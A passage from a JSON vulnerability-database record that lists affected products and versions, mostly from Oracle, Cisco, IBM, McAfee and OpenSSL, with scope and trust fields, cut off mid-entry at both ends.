"peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.55" }, { "model": "unified ip conference phone for third-party call control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "project openssl 1.0.2e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.1" }, { "model": "webex meetings for windows phone", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "82.8" }, { "model": "anyconnect secure mobility client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "project openssl 1.0.1q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.7" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.7" }, { "model": "telepresence integrator c series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "agent desktop", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment intirim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.133" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.3" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "webex meetings client hosted", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "content security management appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.140" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.8" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.14" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "jabber client framework components", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified sip proxy software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.4" }, { "model": "telepresence system tx9000", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "netflow generation appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.403" }, { "model": "unified sip proxy software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.1.4.7895" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "mobility services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "openssh for gpfs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "telepresence server and mse", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "701087104.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.10" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.6" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "ucs series and series fabric interconnects", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "620063000" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "webex meeting center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.3.0" }, { "model": "netflow generation appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.1(1)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.13" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.6" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.2" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.71" }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "powerkvm update", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.3-6513" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.28" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "40002.9" }, { "model": "intracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.29" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.07" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "spa51x ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.8.15.7.15" }, { "model": "transportation management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.2.0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.3.0" }, { "model": "prime infrastructure", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "powerkvm update", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.23" }, { "model": "computer telephony integration object server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media and", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3103200" }, { "model": "small business series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.24" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "content security appliance update servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "videoscape anyres live", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.7.2" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.6" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.4" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.9" }, { "model": "universal small cell iuh", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "solaris sru11.6", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "11.3" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.2" }, { "model": "project openssl 1.0.1m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.4" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-326.1" }, { "model": "unity express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.1.8" }, { "model": "small business series managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10006.1" }, { "model": "telepresence isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "series smart plus switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2200" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "virtual security gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.4.1102" }, { "model": "access manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.1.4.3.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "telepresence tx9000 series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "telepresence system series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30006.1" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.2.0" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.4" }, { "model": "one portal", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.13" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.12" }, { "model": "ucs b-series blade servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "unified attendant console standard", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.5" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.9" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.32" }, { "model": "enterprise content delivery system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.9" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "mds series multilayer switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-3.0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.1.1" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.1" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence tx9000 series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "prime performance manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tealeaf customer experience on cloud network capture add-on", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "16.1.01" }, { "model": "smart net total care local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.12" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.8.9" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "integrated management module for system yuoo", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "nexus series fabric switches aci mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "prime performance manager sp1611", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.7" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.12" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.22" }, { "model": "unified ip phone 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6901" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.23" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.16" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.10" }, { "model": "telepresence server and mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "701087100" }, { "model": "identity services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90006.2.19" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270015.5(3)" }, { "model": "bigfix platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-32" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.30" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.4" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.11" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.3.0.1098" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "digital media manager 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified workforce optimization quality management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "telepresence integrator c series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.13" }, { "model": "spa122 analog telephone adapter with router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "cloud object storage", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.5" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.14" }, { "model": "ios xr software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.4" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.4" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.7.0" }, { "model": "ace application control engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "47100" }, { "model": "oss support tools", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "8.15.17.3.14" }, { "model": "anyconnect secure mobility client for mac os", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "x0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.2.0" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.2" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime infrastructure plug and play standalone gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.2" }, { "model": "tivoli provisioning manager for images build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "virtual security gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.6" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50006.2.19" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.3" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for iphone and ipad", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.3" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "telepresence video communication server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "jabber", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "connected analytics for collaboration", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.4.1" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "multicast manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.3" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.8" }, { "model": "webex node for mcs", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mcu", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.5(1.89)" }, { "model": "management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video distribution suite for internet streaming", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.003(002)" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.31" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8204.4" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "sterling connect:direct for hp nonstop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.3" }, { "model": "project openssl 1.0.2c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.13" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.400" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "expressway series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "prime network", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "431" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "small business spa500 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.26" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "network analysis module 6.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence system ex series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "mxe series media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "project openssl 1.0.2b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": 